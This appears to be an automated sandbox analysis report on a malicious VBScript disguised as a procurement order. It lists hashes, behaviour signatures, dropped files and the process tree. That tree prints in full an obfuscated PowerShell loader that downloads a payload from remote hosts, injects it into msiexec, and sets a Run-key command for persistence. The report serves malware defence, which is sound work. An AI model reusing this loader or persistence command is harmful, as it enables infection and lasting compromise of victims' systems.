Overview

overview

8

Static

static

1

Tender_pro...4_.vbs

windows7-x64

6

Tender_pro...4_.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    276s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/11/2024, 09:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Tender_procurement_product_order__21_11_2024_.vbs

  • Size

    28KB

  • MD5

    e287e89a039bac210a685df3a02acf18

  • SHA1

    f835a3e07e7e0343c8ef323365e94967b60eae1f

  • SHA256

    ca82b1e207de187c0e8f7ecf45397c1b2161f97a6ef7909616700c3bfc97aa10

  • SHA512

    93c29f68bab89ada12554bffd8822f9c7e90a5a69d9b4c9a49374c991236c8cc32bfb7c496e67abb2efe0f584a125cff58380eb46e73feb36fc1efdc657642ca

  • SSDEEP

    384:f9xA7f2VAt1fwEpk6RQ2LpnVYnZIRB87rNfSZyiLPTG3pKxR:f9x4+IwIQ2LlQZEBCrFlpKr

Score
8/10
discoveryexecutionpersistence

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Tender_procurement_product_order__21_11_2024_.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3144
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Alfred Calliphorid Instruktionsfelterne Moated Millilux Prouder #><#Sprregrnserne Lobbyism Genbrugsmuligheders #>$Olicom='Besudlende';function elaphurine($Efterskrev){If ($host.DebuggerEnabled) {$srtrykket=5} for ($Cosmolatry=$srtrykket;;$Cosmolatry+=6){if(!$Efterskrev[$Cosmolatry]) { break }$Autogene+=$Efterskrev[$Cosmolatry]}$Autogene}function Chevronelly($Problemlsningens3){ .($Karryen) ($Problemlsningens3)}$sideslip=elaphurine ' KapiNF,agreKnobetflyve.AnthoWPericeSkankB FuglCZygadlExsiliSudateRespeN HandT';$Salonriffel234=elaphurine 'PrescMTr.itoK lkaz,elasiSejtrlAssimlinteraAspha/';$Propre=elaphurine 'Bi,amT De,il Ba ssReces1Trans2';$Recloseable='R spp[OpslaNR,deheUnde tOx di. TordSFarveE V,nkR .lynV spenI TakkcExpenephenoPDa elo Berbi.inrfn Yogit T.rmmLanceau scrnKlassApri,igreporETog,tr L pe] Foru: ommi: WhitsPhal e .onmCPanniUEcderR EngaiEffecTAsyleY Sa dp InfaR Su,poFi,keTLegiooSta,sCTu nvOSta,llInter=L eti$ GossPSmertrSpillOQuerupTrykkRIndusE';$Salonriffel234+=elaphurine 'Pet,c5Modha.spray0 Inte Chev(BekraWElectiCylinnUnexodStvnio ,ottwNuk es Flag BinomNLikewTIndef Engdr1D sem0 ycod.Adeny0Clinc;Mo.ot CirkuWEnnoii D stn raft6nost.4 Dipl; Slee BrickxVippe6 boun4Blind; land AfladrNonblvSup l:Randb1Fdeby3C nfr1Hoved.App e0B.gni) prog MillkGDediceFlagecUmindkDvrgeo rags/Alloc2 ,bet0Char,1unger0 elve0Frem,1 Misd0Forsk1F rth ,earbF.rchiiSpoorrGenn eKonkofRodfoo enyoxPr nu/Iso.l1Brokb3Studi1Alyta. Naca0';$Dissentients=elaphurine 'Jazzbu,olossModulESeklerHazar-majusaA ganGkoupre HypoN UdfrT';$Durgan=elaphurine 'Ch eshGenertHyldetGr upp ilsms F es:Fo ma/Gr.pp/Impl,q CatapBygge.ModullProgrqGeninacamereTonalbgenfooorato2 Ynke.SubadrRestauUngka.Kultuc TjenoBret mTores/Myz sPInteroSpa slU deryCaprenEntere utles romaiDisenaFiret1spryd9Rasc 6Archd.Old,bhApterhr parp Fog > mi,zhNone tHy ert kolepCamp sPreen: Elec/f.sti/Visios Cam.h UndeaPue plsubmaoChrisu RecixSpan tEnhat. Stret UnbroBismep Meta/,onjuPPengeo .glolRadioyGravenVelafevandrsChondiU,ioladanit1Ou li9fluev6,bema.TfleuhF nlah Sa ap';$Vignetted=elaphurine ' Alka>';$Karryen=elaphurine 'afgh IG edveLand.x';$Cosmolatryrishism='extemporize';$Opfriskende='\Undsttelses.Sup';Chevronelly (elaphurine 'vaabe$SkirwGSprinlDumpioBuf lBAnsagAfrimrl,ykle:PeccaWOvereA FiguiGunteLInnutMA soneuove,NN esttUnack= Tur $PokereTachynHyperV agon: ElecA RegePSprogPShoveDU.mugAskatttBournaToile+ F uc$Formio StraPF ndif SondrHagioIkontrSBordtKBlom.eNymphnMariud ipole');Chevronelly (elaphurine 'u acc$FunktgRelisLEnjoyotoupebF jesASprgelUlogi:PressFTo akoOwsenDW,gglbunfroOWondelBrigiDS miaP R,korBrndkOForsaGServir InteANundiMVi tu= uske$Skul dUn ofuKromaRR.skigSe inADiv.rn .hoo.C untStombap Pja lS eetIMindrtUopdr(Panta$ Enl vS rafiApos.G opdrnSericeSa att Sal tInertE OutrdT.app)');Chevronelly (elaphurine $Recloseable);$Durgan=$Fodboldprogram[0];$Jublet78=(elaphurine 'Antim$Tran,GH sholWhimpo Ops,BU cleAGansklStude:SulphePatruk agrisScen tOutporFrizzeC uzamAlbatuPreadm FestSMetropRe sauStivlNQuaffKCa.botUformECo.nttNeura=StromN AsyleParkeWPylad-Svbero SpitB.kidtjPapiseLr,rkCSneerTBra n ,jaskSMugniYopposS geortTribue fiskMTi.sl.Halvo$bryllS,egnfIMicroDPeroxESal.ssConcilBlennICalceP');Chevronelly ($Jublet78);Chevronelly (elaphurine ' Ho,d$Tras EUnneikga,nisTeknitAfspirBridieBibbamS,ippuSamsvmMystis r trp SelvuStatonSup rk TrowtDr nne rkitt Tel,.C.ntrHExcrueTraveaGra.ddAdvereS,lefr.psissSidef[ ecam$BlainDStatuiR,mmes GrunsAccrueKikkenGenintSickeiAadr eSe,sinJebl tPlei sAn,el]Nodu =Incon$ ropoSTiggea dtvlforf oFersvnVe ovr Dr ni P infSaradf ergoeRewanlOnese2 nfol3 Rett4');$Impluvia=elaphurine ' nver$WinteE,entrkRuntisIagtttRummerFlangeGennemA sinuOndulmL gtesHovedpSid buJor,vn everk MoghtS.ovteR.ppetSyg p.LasheDski tocelanwSub rnSeptulSub toChir aBasildAmphiFRitori T belGale.eU ban(cusin$Evo uD B.svuFysiorblancg be aaTopianS nio, ekmp$Bioa,T K,eeeAmph.sRa smtMo oli E esf Ekskiinh lcPhytoa Usigt misti Sagso TelenTuran)';$Testification=$Wailment;Chevronelly (elaphurine 'A sen$ HeteGM,teoLafvarO ilaBThrilA VeloL Feni:Sola KDive.OS,igeRForsvIFredsNEntratLuxemH,lutt=Tempe(VejkaTFalloeCockps,uroiTHove -AmoriPsurmoARheo tProtrH ,rre Bavia$FyrsttSortbE ErwiSUdkastMarmoICosgrfKlad.iVegetCPronuaBrom tExpecI Srs OGraphnVar l)');while (!$Korinth) {Chevronelly (elaphurine ' Vide$ Adjeg SubalK nfeoRave,bTejn,a nterlMetal:Pr prVS,idsrTvrsudIntersFortra AmittLogertBebloePersosServe=Famil$Old iEVan tfBrn,ttSympheGentlr Illul Rubeevi elv Sk ie OverlMngdes .andeIslndspeb.tvbaboorsudicd.ystviIndurgcri ieA,pors') ;Chevronelly $Impluvia;Chevronelly (elaphurine 'CharrsSlangt UnprAT eneRvanditKrads- ScalsDunenlSignieAnticE.otarpPr pe Signa4');Chevronelly (elaphurine 'Besgs$Vigt gPyalilJulemoCampob GrafA.ocialFin.n: caraKAttesoIndokR .alaIRrfabN C catToolhhParde=Poura( ByggtResmeE ForksHeterTangie-Res,apWateraAk.ioTCigarh Ov r Krok,$SyzygTBiopoeSunbaSProgrtRatakiPilgrfNovatIProvecAmo aaEesmitExtraiLanceOAdeliNKl ak)') ;Chevronelly (elaphurine ' Fren$Komplg,jakbl As.iOMi osbSerbeAOrbicLBlaak:.radulUdsprACh.omNAlumiD FlaspOveral isbeA HypeN,oothE Cord=C pra$FiliagPenn.lGermao ZarrBVerdeA sej LBot n: Met.L RegnsRid.lLWhal aV.emadHedo T itrie Avoc+Grang+vidne%perso$ ummfPen aoChortDko,trBCeratoPiaroLOxygeDmejerpDie erOpporOSepulGUdtrarfron AUnifoMHexac.Prepoc Hje.oBejigU,gtppnRe.acT') ;$Durgan=$Fodboldprogram[$Landplane]}$Pligthugger=298196;$Badland=32408;Chevronelly (elaphurine 'Ekste$R.oing,rogrLDacapoc imiBBestra MetoLTelef:PhthiC pria FinenDis oiBaltedEdri,SFarsa klunt=Vivac PlasgKultuESpiseTS msm-PomercAnginoWeekenUnquetReproe Sh pNBrdniTRigou .irk$PhospTFjordeAccidS GashTSprriiHo.edf ul.kIProgrCDeo yAWai dTNig ti RejaoElvern');Chevronelly (elaphurine 'Ba.mf$ Bedsg AfdalRhinooKettabAkt vaEnekal Foru:Lith PAnsvaaJaegexSc letunderoUnflonOrdre Udko=Eksk, Lispe[ SmaaSBuoyaymice s LydstHearteApokamFlamb.BladkCVivikoW,nkinSeptevUnreseExplorUnsettForrd]Gi ad: verd: ,seuF TranrDavaco Mdenm smerBWieneaAfkogs Ben.e ndef6G omi4InterSSm ret trerlaaseiBiltonL vergSyncy( krok$T glpC rikoaCardinB lliiClo edForras.ncoo)');Chevronelly (elaphurine ',ngli$Bi tjgskrmeL MaanOVictobBdestA ascalBedco: anitAUmiacmT oglESynthtFakk.r JorooFngsepLydhrE Hote1A.per7sme n Skoma=Cytos Prec [PerviS epi YTempeSFons tUgandeRaym.m aste.KnoglT dorsEBr nzXTheretTerce.Pous.e rimnDu.tucSk vfoGalopd ktteILuftgnOp agGMalma]Neuro: Tubm: nsurAStenkSp ytic PashiHyperiparke. UsurgResu,ESoldaTGlumosD rektsyll,RDkkenI rivenSkammgmisfe( Prot$sekunpPlastArektix RentTContrO Illun Sulp)');Chevronelly (elaphurine 'A,lan$CanewG erogLDipe oA,dreBGarroA HaemlImple:avledL SelvgRodomN Refoe RaviDBehaeeOghamTa tene Synkk BystT ressOWailirFlammEring RTorde=Euden$HofmaaFor eMCenteeTilsyT KobbrTinn,OBijouP TerrENothi1fu.dk7Po tc.B niaS StenukorstbDalbosTung,T,olitR.lectINoti.NBelovgSkean(Zanas$LegetPPri,uLKejseiKoncegResertStlndhLnn nU Per,GobdurgRumfoESter,rOverf, kyts$MandsbS.ummAGu dtd Allel FlokAOpininGoodyDS iri)');Chevronelly $Lgnedetektorer;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1740
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Alfred Calliphorid Instruktionsfelterne Moated Millilux Prouder #><#Sprregrnserne Lobbyism Genbrugsmuligheders #>$Olicom='Besudlende';function elaphurine($Efterskrev){If ($host.DebuggerEnabled) {$srtrykket=5} for ($Cosmolatry=$srtrykket;;$Cosmolatry+=6){if(!$Efterskrev[$Cosmolatry]) { break }$Autogene+=$Efterskrev[$Cosmolatry]}$Autogene}function Chevronelly($Problemlsningens3){ .($Karryen) ($Problemlsningens3)}$sideslip=elaphurine ' KapiNF,agreKnobetflyve.AnthoWPericeSkankB FuglCZygadlExsiliSudateRespeN HandT';$Salonriffel234=elaphurine 'PrescMTr.itoK lkaz,elasiSejtrlAssimlinteraAspha/';$Propre=elaphurine 'Bi,amT De,il Ba ssReces1Trans2';$Recloseable='R spp[OpslaNR,deheUnde tOx di. TordSFarveE V,nkR .lynV spenI TakkcExpenephenoPDa elo Berbi.inrfn Yogit T.rmmLanceau scrnKlassApri,igreporETog,tr L pe] Foru: ommi: WhitsPhal e .onmCPanniUEcderR EngaiEffecTAsyleY Sa dp InfaR Su,poFi,keTLegiooSta,sCTu nvOSta,llInter=L eti$ GossPSmertrSpillOQuerupTrykkRIndusE';$Salonriffel234+=elaphurine 'Pet,c5Modha.spray0 Inte Chev(BekraWElectiCylinnUnexodStvnio ,ottwNuk es Flag BinomNLikewTIndef Engdr1D sem0 ycod.Adeny0Clinc;Mo.ot CirkuWEnnoii D stn raft6nost.4 Dipl; Slee BrickxVippe6 boun4Blind; land AfladrNonblvSup l:Randb1Fdeby3C nfr1Hoved.App e0B.gni) prog MillkGDediceFlagecUmindkDvrgeo rags/Alloc2 ,bet0Char,1unger0 elve0Frem,1 Misd0Forsk1F rth ,earbF.rchiiSpoorrGenn eKonkofRodfoo enyoxPr nu/Iso.l1Brokb3Studi1Alyta. Naca0';$Dissentients=elaphurine 'Jazzbu,olossModulESeklerHazar-majusaA ganGkoupre HypoN UdfrT';$Durgan=elaphurine 'Ch eshGenertHyldetGr upp ilsms F es:Fo ma/Gr.pp/Impl,q CatapBygge.ModullProgrqGeninacamereTonalbgenfooorato2 Ynke.SubadrRestauUngka.Kultuc TjenoBret mTores/Myz sPInteroSpa slU deryCaprenEntere utles romaiDisenaFiret1spryd9Rasc 6Archd.Old,bhApterhr parp Fog > mi,zhNone tHy ert kolepCamp sPreen: Elec/f.sti/Visios Cam.h UndeaPue plsubmaoChrisu RecixSpan tEnhat. Stret UnbroBismep Meta/,onjuPPengeo .glolRadioyGravenVelafevandrsChondiU,ioladanit1Ou li9fluev6,bema.TfleuhF nlah Sa ap';$Vignetted=elaphurine ' Alka>';$Karryen=elaphurine 'afgh IG edveLand.x';$Cosmolatryrishism='extemporize';$Opfriskende='\Undsttelses.Sup';Chevronelly (elaphurine 'vaabe$SkirwGSprinlDumpioBuf lBAnsagAfrimrl,ykle:PeccaWOvereA FiguiGunteLInnutMA soneuove,NN esttUnack= Tur $PokereTachynHyperV agon: ElecA RegePSprogPShoveDU.mugAskatttBournaToile+ F uc$Formio StraPF ndif SondrHagioIkontrSBordtKBlom.eNymphnMariud ipole');Chevronelly (elaphurine 'u acc$FunktgRelisLEnjoyotoupebF jesASprgelUlogi:PressFTo akoOwsenDW,gglbunfroOWondelBrigiDS miaP R,korBrndkOForsaGServir InteANundiMVi tu= uske$Skul dUn ofuKromaRR.skigSe inADiv.rn .hoo.C untStombap Pja lS eetIMindrtUopdr(Panta$ Enl vS rafiApos.G opdrnSericeSa att Sal tInertE OutrdT.app)');Chevronelly (elaphurine $Recloseable);$Durgan=$Fodboldprogram[0];$Jublet78=(elaphurine 'Antim$Tran,GH sholWhimpo Ops,BU cleAGansklStude:SulphePatruk agrisScen tOutporFrizzeC uzamAlbatuPreadm FestSMetropRe sauStivlNQuaffKCa.botUformECo.nttNeura=StromN AsyleParkeWPylad-Svbero SpitB.kidtjPapiseLr,rkCSneerTBra n ,jaskSMugniYopposS geortTribue fiskMTi.sl.Halvo$bryllS,egnfIMicroDPeroxESal.ssConcilBlennICalceP');Chevronelly ($Jublet78);Chevronelly (elaphurine ' Ho,d$Tras EUnneikga,nisTeknitAfspirBridieBibbamS,ippuSamsvmMystis r trp SelvuStatonSup rk TrowtDr nne rkitt Tel,.C.ntrHExcrueTraveaGra.ddAdvereS,lefr.psissSidef[ ecam$BlainDStatuiR,mmes GrunsAccrueKikkenGenintSickeiAadr eSe,sinJebl tPlei sAn,el]Nodu =Incon$ ropoSTiggea dtvlforf oFersvnVe ovr Dr ni P infSaradf ergoeRewanlOnese2 nfol3 Rett4');$Impluvia=elaphurine ' nver$WinteE,entrkRuntisIagtttRummerFlangeGennemA sinuOndulmL gtesHovedpSid buJor,vn everk MoghtS.ovteR.ppetSyg p.LasheDski tocelanwSub rnSeptulSub toChir aBasildAmphiFRitori T belGale.eU ban(cusin$Evo uD B.svuFysiorblancg be aaTopianS nio, ekmp$Bioa,T K,eeeAmph.sRa smtMo oli E esf Ekskiinh lcPhytoa Usigt misti Sagso TelenTuran)';$Testification=$Wailment;Chevronelly (elaphurine 'A sen$ HeteGM,teoLafvarO ilaBThrilA VeloL Feni:Sola KDive.OS,igeRForsvIFredsNEntratLuxemH,lutt=Tempe(VejkaTFalloeCockps,uroiTHove -AmoriPsurmoARheo tProtrH ,rre Bavia$FyrsttSortbE ErwiSUdkastMarmoICosgrfKlad.iVegetCPronuaBrom tExpecI Srs OGraphnVar l)');while (!$Korinth) {Chevronelly (elaphurine ' Vide$ Adjeg SubalK nfeoRave,bTejn,a nterlMetal:Pr prVS,idsrTvrsudIntersFortra AmittLogertBebloePersosServe=Famil$Old iEVan tfBrn,ttSympheGentlr Illul Rubeevi elv Sk ie OverlMngdes .andeIslndspeb.tvbaboorsudicd.ystviIndurgcri ieA,pors') ;Chevronelly $Impluvia;Chevronelly (elaphurine 'CharrsSlangt UnprAT eneRvanditKrads- ScalsDunenlSignieAnticE.otarpPr pe Signa4');Chevronelly (elaphurine 'Besgs$Vigt gPyalilJulemoCampob GrafA.ocialFin.n: caraKAttesoIndokR .alaIRrfabN C catToolhhParde=Poura( ByggtResmeE ForksHeterTangie-Res,apWateraAk.ioTCigarh Ov r Krok,$SyzygTBiopoeSunbaSProgrtRatakiPilgrfNovatIProvecAmo aaEesmitExtraiLanceOAdeliNKl ak)') ;Chevronelly (elaphurine ' Fren$Komplg,jakbl As.iOMi osbSerbeAOrbicLBlaak:.radulUdsprACh.omNAlumiD FlaspOveral isbeA HypeN,oothE Cord=C pra$FiliagPenn.lGermao ZarrBVerdeA sej LBot n: Met.L RegnsRid.lLWhal aV.emadHedo T itrie Avoc+Grang+vidne%perso$ ummfPen aoChortDko,trBCeratoPiaroLOxygeDmejerpDie erOpporOSepulGUdtrarfron AUnifoMHexac.Prepoc Hje.oBejigU,gtppnRe.acT') ;$Durgan=$Fodboldprogram[$Landplane]}$Pligthugger=298196;$Badland=32408;Chevronelly (elaphurine 'Ekste$R.oing,rogrLDacapoc imiBBestra MetoLTelef:PhthiC pria FinenDis oiBaltedEdri,SFarsa klunt=Vivac PlasgKultuESpiseTS msm-PomercAnginoWeekenUnquetReproe Sh pNBrdniTRigou .irk$PhospTFjordeAccidS GashTSprriiHo.edf ul.kIProgrCDeo yAWai dTNig ti RejaoElvern');Chevronelly (elaphurine 'Ba.mf$ Bedsg AfdalRhinooKettabAkt vaEnekal Foru:Lith PAnsvaaJaegexSc letunderoUnflonOrdre Udko=Eksk, Lispe[ SmaaSBuoyaymice s LydstHearteApokamFlamb.BladkCVivikoW,nkinSeptevUnreseExplorUnsettForrd]Gi ad: verd: ,seuF TranrDavaco Mdenm smerBWieneaAfkogs Ben.e ndef6G omi4InterSSm ret trerlaaseiBiltonL vergSyncy( krok$T glpC rikoaCardinB lliiClo edForras.ncoo)');Chevronelly (elaphurine ',ngli$Bi tjgskrmeL MaanOVictobBdestA ascalBedco: anitAUmiacmT oglESynthtFakk.r JorooFngsepLydhrE Hote1A.per7sme n Skoma=Cytos Prec [PerviS epi YTempeSFons tUgandeRaym.m aste.KnoglT dorsEBr nzXTheretTerce.Pous.e rimnDu.tucSk vfoGalopd ktteILuftgnOp agGMalma]Neuro: Tubm: nsurAStenkSp ytic PashiHyperiparke. UsurgResu,ESoldaTGlumosD rektsyll,RDkkenI rivenSkammgmisfe( Prot$sekunpPlastArektix RentTContrO Illun Sulp)');Chevronelly (elaphurine 'A,lan$CanewG erogLDipe oA,dreBGarroA HaemlImple:avledL SelvgRodomN Refoe RaviDBehaeeOghamTa tene Synkk BystT ressOWailirFlammEring RTorde=Euden$HofmaaFor eMCenteeTilsyT KobbrTinn,OBijouP TerrENothi1fu.dk7Po tc.B niaS StenukorstbDalbosTung,T,olitR.lectINoti.NBelovgSkean(Zanas$LegetPPri,uLKejseiKoncegResertStlndhLnn nU Per,GobdurgRumfoESter,rOverf, kyts$MandsbS.ummAGu dtd Allel FlokAOpininGoodyDS iri)');Chevronelly $Lgnedetektorer;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1420
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3528
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Seaways" /t REG_EXPAND_SZ /d "%worktop% -windowstyle 1 $Emotionalist=(gp -Path 'HKCU:\Software\Fraflytnings\').Modstningsslutningernes;%worktop% ($Emotionalist)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1552
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Seaways" /t REG_EXPAND_SZ /d "%worktop% -windowstyle 1 $Emotionalist=(gp -Path 'HKCU:\Software\Fraflytnings\').Modstningsslutningernes;%worktop% ($Emotionalist)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1524

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d336b18e0e02e045650ac4f24c7ecaa7

    SHA1

    87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

    SHA256

    87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

    SHA512

    e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_legu4nug.v4o.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Undsttelses.Sup
    Filesize

    430KB

    MD5

    b97842722eac9299a53fa516100f2e81

    SHA1

    6f13d74dce14e561374f96e5589fe03222c34816

    SHA256

    803e13961524a7ef11d1000f679ea8b8c5908ad712de1cb5f9c8be27256f8e15

    SHA512

    8613c39d7fe8524fc3347c792f1280db7d7d6abe5c9898a76b5183973be20a7741a658a84886ae825c1d061b0469d7f891ce379c210cecc54630fc0dfda81c2d

    Download Submit

  • memory/1420-39-0x0000000007CF0000-0x000000000836A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1420-35-0x0000000006020000-0x0000000006374000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1420-45-0x0000000008ED0000-0x000000000E50D000-memory.dmp

    Filesize

    86.2MB

    Download

  • memory/1420-43-0x0000000008920000-0x0000000008EC4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1420-42-0x00000000076D0000-0x00000000076F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1420-41-0x0000000007740000-0x00000000077D6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/1420-21-0x0000000002B60000-0x0000000002B96000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1420-22-0x0000000005620000-0x0000000005C48000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1420-28-0x0000000005D30000-0x0000000005D52000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1420-30-0x0000000005EB0000-0x0000000005F16000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1420-29-0x0000000005DD0000-0x0000000005E36000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1420-40-0x0000000006A30000-0x0000000006A4A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1420-38-0x00000000064D0000-0x000000000651C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1420-37-0x0000000006480000-0x000000000649E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1740-11-0x00007FFA81100000-0x00007FFA81BC1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1740-0-0x00007FFA81103000-0x00007FFA81105000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1740-12-0x00007FFA81100000-0x00007FFA81BC1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1740-20-0x00007FFA81100000-0x00007FFA81BC1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1740-17-0x00007FFA81100000-0x00007FFA81BC1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1740-16-0x00007FFA81100000-0x00007FFA81BC1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1740-6-0x00000255B1B40000-0x00000255B1B62000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1740-14-0x00007FFA81103000-0x00007FFA81105000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3528-49-0x0000000000400000-0x00000000005E4000-memory.dmp

    Filesize

    1.9MB

    Download

  • memory/3528-50-0x0000000000400000-0x00000000005E4000-memory.dmp

    Filesize

    1.9MB

    Download